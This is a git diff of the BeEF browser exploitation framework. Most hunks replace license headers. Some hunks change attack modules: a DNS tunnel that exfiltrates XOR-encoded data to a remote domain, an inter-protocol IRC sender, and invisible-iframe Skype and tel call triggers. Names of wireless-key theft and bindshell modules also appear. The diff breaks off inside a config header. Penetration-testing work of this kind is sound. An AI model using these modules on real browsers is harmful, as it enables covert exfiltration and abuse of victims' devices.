get_wireless_keys: diff --git a/modules/host/get_wireless_keys/module.rb b/modules/host/get_wireless_keys/module.rb index 0a3f75be2..73bbe20b6 100644 --- a/modules/host/get_wireless_keys/module.rb +++ b/modules/host/get_wireless_keys/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Get_wireless_keys < BeEF::Core::Command diff --git a/modules/host/get_wireless_keys/wirelessZeroConfig.java b/modules/host/get_wireless_keys/wirelessZeroConfig.java index 8349d64a2..5e05365dd 100644 --- a/modules/host/get_wireless_keys/wirelessZeroConfig.java +++ b/modules/host/get_wireless_keys/wirelessZeroConfig.java @@ -1,3 +1,9 @@ +/* + * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net + * Browser Exploitation Framework (BeEF) - http://beefproject.com + * See the file 'doc/COPYING' for copying permission + */ + import java.io.*; import java.util.*; import java.net.*; diff --git a/modules/host/hook_default_browser/command.js b/modules/host/hook_default_browser/command.js index 2e565a778..e765a693a 100644 --- a/modules/host/hook_default_browser/command.js +++ b/modules/host/hook_default_browser/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var pdf_url = 'http://'+beef.net.host+ ':' + beef.net.port + '/report.pdf'; diff --git a/modules/host/hook_default_browser/config.yaml b/modules/host/hook_default_browser/config.yaml index 0033717ba..7d5bd425f 100644 --- a/modules/host/hook_default_browser/config.yaml +++ b/modules/host/hook_default_browser/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: @@ -24,6 +14,6 @@ beef: target: not_working: ALL: - os: ["iPhone"] + os: ["iOS"] working: ["All"] user_notify: ["FF", "C"] diff --git a/modules/host/hook_default_browser/module.rb b/modules/host/hook_default_browser/module.rb index bcb1488fb..e5ea146af 100644 --- a/modules/host/hook_default_browser/module.rb +++ b/modules/host/hook_default_browser/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Hook_default_browser < BeEF::Core::Command diff --git a/modules/host/insecure_url_skype/command.js b/modules/host/insecure_url_skype/command.js index 6521d73bc..8e3df94e6 100644 --- a/modules/host/insecure_url_skype/command.js +++ b/modules/host/insecure_url_skype/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var sploit = beef.dom.createInvisibleIframe(); sploit.src = 'skype:<%= @tel_num %>?call'; diff --git a/modules/host/insecure_url_skype/config.yaml b/modules/host/insecure_url_skype/config.yaml index cb35a4c23..a3a3eb9f2 100644 --- a/modules/host/insecure_url_skype/config.yaml +++ b/modules/host/insecure_url_skype/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/host/insecure_url_skype/module.rb b/modules/host/insecure_url_skype/module.rb index 2b19303ed..11e364837 100644 --- a/modules/host/insecure_url_skype/module.rb +++ b/modules/host/insecure_url_skype/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Insecure_url_skype < BeEF::Core::Command diff --git a/modules/host/iphone_tel/command.js b/modules/host/iphone_tel/command.js index 18966fc49..63509f310 100644 --- a/modules/host/iphone_tel/command.js +++ b/modules/host/iphone_tel/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var sploit = beef.dom.createInvisibleIframe(); sploit.src = 'tel:<%= @tel_num %>'; diff --git a/modules/host/iphone_tel/config.yaml b/modules/host/iphone_tel/config.yaml index d3bb15769..d9947a9cf 100644 --- a/modules/host/iphone_tel/config.yaml +++ b/modules/host/iphone_tel/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: @@ -24,7 +14,7 @@ beef: target: user_notify: S: - os: ["iPhone"] + os: ["iOS"] not_working: ALL: os: ["All"] diff --git a/modules/host/iphone_tel/module.rb b/modules/host/iphone_tel/module.rb index 2d14f1c25..d2c422a68 100644 --- a/modules/host/iphone_tel/module.rb +++ b/modules/host/iphone_tel/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Iphone_tel < BeEF::Core::Command diff --git a/modules/host/physical_location/command.js b/modules/host/physical_location/command.js index 7d2c1947c..1a579d28a 100644 --- a/modules/host/physical_location/command.js +++ b/modules/host/physical_location/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { if(!beef.geolocation.isGeolocationEnabled()){ diff --git a/modules/host/physical_location/config.yaml b/modules/host/physical_location/config.yaml index 704f77ffd..716fe62dd 100644 --- a/modules/host/physical_location/config.yaml +++ b/modules/host/physical_location/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/host/physical_location/module.rb b/modules/host/physical_location/module.rb index 82bd71e8c..ca9170a8d 100644 --- a/modules/host/physical_location/module.rb +++ b/modules/host/physical_location/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Physical_location < BeEF::Core::Command diff --git a/modules/ipec/cross_site_printing/command.js b/modules/ipec/cross_site_printing/command.js index 49a0ef690..81dea2f96 100644 --- a/modules/ipec/cross_site_printing/command.js +++ b/modules/ipec/cross_site_printing/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var target_ip = "<%= @ip %>"; diff --git a/modules/ipec/cross_site_printing/config.yaml b/modules/ipec/cross_site_printing/config.yaml index 370b690bd..fca320e93 100644 --- a/modules/ipec/cross_site_printing/config.yaml +++ b/modules/ipec/cross_site_printing/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/ipec/cross_site_printing/module.rb b/modules/ipec/cross_site_printing/module.rb index e74227dee..7a629f80c 100644 --- a/modules/ipec/cross_site_printing/module.rb +++ b/modules/ipec/cross_site_printing/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Cross_site_printing < BeEF::Core::Command diff --git a/modules/ipec/dns_tunnel/command.js b/modules/ipec/dns_tunnel/command.js index f2b6040fe..a41a2b4d3 100644 --- a/modules/ipec/dns_tunnel/command.js +++ b/modules/ipec/dns_tunnel/command.js @@ -1,29 +1,20 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + /* -Poor man's omni-directional DNS tunnel in JavaScript. +Poor man's unidirectional DNS tunnel in JavaScript. The largely-untested, highly experimental first draft. How it works: A remote domain with a DNS server configured to accept wildcard subdomains is required to receive the data. BeEF does not support this feature so you're on your own when it comes to decoding the information. -A domain and message are taken as input. The message is XOR'd, url encoded, the "%" are replaced with "." and the message is split into segments of 230 bytes. The queries are sent in sequence however there are plans to randomize the order. +A domain and message are taken as input. The message is XOR'd, url encoded, the "%" are replaced with "." and the message is split into segments of 230 bytes. The segments are sent in sequence however there are plans to randomize the order. -To allow the original message to be pieced back together each message is allocated an id and each DNS query is given a sequence number. The final domain name used in the query is structured as follows: +To allow the original message to be pieced back together each message is allocated an id and each DNS query is given a sequence number. The final domain name used in the DNS query is structured as follows: MESSAGE_ID.SEGMENT_SEQUENCE_NUMBER.TOTAL_SEGMENTS.XOR_KEY.MESSAGE_SEGMENT.REMOTE_DOMAIN @@ -37,15 +28,10 @@ o Domain names are limited to 255 characters in length (including dots) o The name space has a maximum depth of 127 levels (ie, maximum 127 subdomains) o Subdomains are limited to 63 characters in length (including the trailing dot) -Each query is sent by appending an image to the DOM containing the query as the image source. The images are later destroyed. - -Features: -o Does not use DNS pre-fetching - The downside is that the requests will take a while to timeout unless the DNS server is configured to reply with NXDOMAIN (ie, blackholed) for all requests. -o Encryption - Uses very weak "encryption" (XOR) and the key is transferred with the request. -o Randomization - Each segment is given a sequence id. TODO: Send segments in a random order. +Each segment is sent by appending an image to the DOM containing the query as the image source. The images are later destroyed. Caveats: -o Omni-directional - Data can only be sent one way. +o Unidirectional - Data can only be sent one way. o Message size - Limited to messages less than 64KB in length. o Limited by JavaScript strings. Byte code needs to be converted to a compatible string before it can be sent. There's also lots of wasted space. Converting to hex would be much cleaner and would save a few bytes for each query. o Throttling - There is no throttling. The browser may only initiate x amount of simultaneous connections. The requests should be throttled to avoid hitting the cap. TODO: Introduce a wait delay between each request to partially account for this. @@ -64,7 +50,7 @@ beef.execute(function() { var domain = "<%= @domain %>"; var message = "<%= @message %>"; - beef.net.dns.send(msgId, message, domain, wait, function(num) { beef.net.send('<%= @command_url %>', <%= @command_id %>, 'dns_requests='+num) } ); + beef.net.dns.send(msgId, message, domain, wait, function(num) { beef.net.send('<%= @command_url %>', <%= @command_id %>, 'dns_requests='+num+' requests sent') } ); }); diff --git a/modules/ipec/dns_tunnel/config.yaml b/modules/ipec/dns_tunnel/config.yaml index 81404dbd1..e570728eb 100644 --- a/modules/ipec/dns_tunnel/config.yaml +++ b/modules/ipec/dns_tunnel/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: @@ -19,7 +9,7 @@ beef: enable: true category: "IPEC" name: "DNS Tunnel" - description: "Sends data over DNS to a server which accepts wildcard subdomains." + description: "This module sends data one way over DNS.

A domain and message are taken as input. The message is XOR'd, url encoded, the '%' are replaced with '.' and the message is split into segments of 230 bytes. The segments are sent in sequence along with the sequence number and XOR key.

Note: A remote domain with a DNS server configured to accept wildcard subdomains is required to receive the data. BeEF does not support this feature so you're on your own when it comes to decoding the information." authors: ["bcoles"] target: working: "All" diff --git a/modules/ipec/dns_tunnel/module.rb b/modules/ipec/dns_tunnel/module.rb index 08b07aa91..cbbeade53 100644 --- a/modules/ipec/dns_tunnel/module.rb +++ b/modules/ipec/dns_tunnel/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Dns_tunnel < BeEF::Core::Command diff --git a/modules/ipec/inter_protocol_imap/command.js b/modules/ipec/inter_protocol_imap/command.js index 130db0727..45201d7da 100644 --- a/modules/ipec/inter_protocol_imap/command.js +++ b/modules/ipec/inter_protocol_imap/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + /** * Inter protocol IMAP module * Ported from BeEF-0.4.0.0 by jgaliana (Original author: Wade) diff --git a/modules/ipec/inter_protocol_imap/config.yaml b/modules/ipec/inter_protocol_imap/config.yaml index 214fa4152..4a510d116 100644 --- a/modules/ipec/inter_protocol_imap/config.yaml +++ b/modules/ipec/inter_protocol_imap/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/ipec/inter_protocol_imap/module.rb b/modules/ipec/inter_protocol_imap/module.rb index 7765a3437..c9c2787b4 100644 --- a/modules/ipec/inter_protocol_imap/module.rb +++ b/modules/ipec/inter_protocol_imap/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Inter_protocol_imap < BeEF::Core::Command diff --git a/modules/ipec/inter_protocol_irc/command.js b/modules/ipec/inter_protocol_irc/command.js index 47eae7975..f8d522a5b 100644 --- a/modules/ipec/inter_protocol_irc/command.js +++ b/modules/ipec/inter_protocol_irc/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + /** * Inter protocol IRC module * Developed by jgaliana @@ -22,34 +13,25 @@ */ beef.execute(function() { - var server = '<%= @server %>'; - var port = '<%= @port %>'; - var nick = '<%= @nick %>'; + var rhost = '<%= @rhost %>'; + var rport = '<%= @rport %>'; + var nick = '<%= @nick %>'; var channel = '<%= @channel %>'; var message = '<%= @message %>'; - var target = "http://" + server + ":" + port; - var irc_commands= "NICK " + nick + "\n"; - irc_commands+= "USER " + nick + " 8 * : " + nick + " user\n"; - irc_commands+= "JOIN " + channel + "\n"; - irc_commands+= "PRIVMSG " + channel + " :" + message + "\n"; - - var iframe = beef.dom.createInvisibleIframe(); - - var form = document.createElement('form'); - form.setAttribute('action', target); - form.setAttribute('method', 'post'); - form.setAttribute('enctype', 'multipart/form-data'); - - var input = document.createElement('input'); - input.setAttribute('type', 'hidden'); - input.setAttribute('name', 'data'); - input.setAttribute('value', irc_commands); - form.appendChild(input); - - iframe.contentWindow.document.body.appendChild(form); - form.submit(); + var irc_commands = "NICK " + nick + "\n"; + irc_commands += "USER " + nick + " 8 * : " + nick + " user\n"; + irc_commands += "JOIN " + channel + "\n"; + irc_commands += "PRIVMSG " + channel + " :" + message + "\nQUIT\n"; + // send commands + var irc_iframe = beef.dom.createIframeIpecForm(rhost, rport, irc_commands); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=IRC command sent"); + // clean up + cleanup = function() { + document.body.removeChild(irc_iframe); + } + setTimeout("cleanup()", 15000); + }); diff --git a/modules/ipec/inter_protocol_irc/config.yaml b/modules/ipec/inter_protocol_irc/config.yaml index 1341b4b7c..d7514b9c4 100644 --- a/modules/ipec/inter_protocol_irc/config.yaml +++ b/modules/ipec/inter_protocol_irc/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/ipec/inter_protocol_irc/module.rb b/modules/ipec/inter_protocol_irc/module.rb index cad8d0380..c38e447ba 100644 --- a/modules/ipec/inter_protocol_irc/module.rb +++ b/modules/ipec/inter_protocol_irc/module.rb @@ -1,27 +1,17 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Inter_protocol_irc < BeEF::Core::Command def self.options return [ - {'name' => 'server', 'ui_label' => 'IRC Server', 'value' => '127.0.0.1'}, - {'name' => 'port', 'ui_label' => 'Port', 'value' => '6667'}, - {'name' => 'nick', 'ui_label' => 'Username', 'value' => 'user1234__'}, - {'name' => 'channel', 'ui_label' => 'Channel', 'value' => '#channel1'}, - {'name' => 'message', 'ui_label' => 'Message', 'value' => 'Message sent from the Browser Exploitation Framework!'} + {'name' => 'rhost', 'ui_label' => 'IRC Server', 'value' => '127.0.0.1'}, + {'name' => 'rport', 'ui_label' => 'Port', 'value' => '6667'}, + {'name' => 'nick', 'ui_label' => 'Username', 'value' => 'user1234__'}, + {'name' => 'channel', 'ui_label' => 'Channel', 'value' => '#channel1'}, + {'name' => 'message', 'ui_label' => 'Message', 'value' => 'Message sent from the Browser Exploitation Framework!'} ] end diff --git a/modules/ipec/inter_protocol_posix_bindshell/command.js b/modules/ipec/inter_protocol_posix_bindshell/command.js index f8e228380..a1425f2dc 100644 --- a/modules/ipec/inter_protocol_posix_bindshell/command.js +++ b/modules/ipec/inter_protocol_posix_bindshell/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var target_ip = "<%= @ip %>"; diff --git a/modules/ipec/inter_protocol_posix_bindshell/config.yaml b/modules/ipec/inter_protocol_posix_bindshell/config.yaml index 474d0940c..9e1596abe 100644 --- a/modules/ipec/inter_protocol_posix_bindshell/config.yaml +++ b/modules/ipec/inter_protocol_posix_bindshell/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net 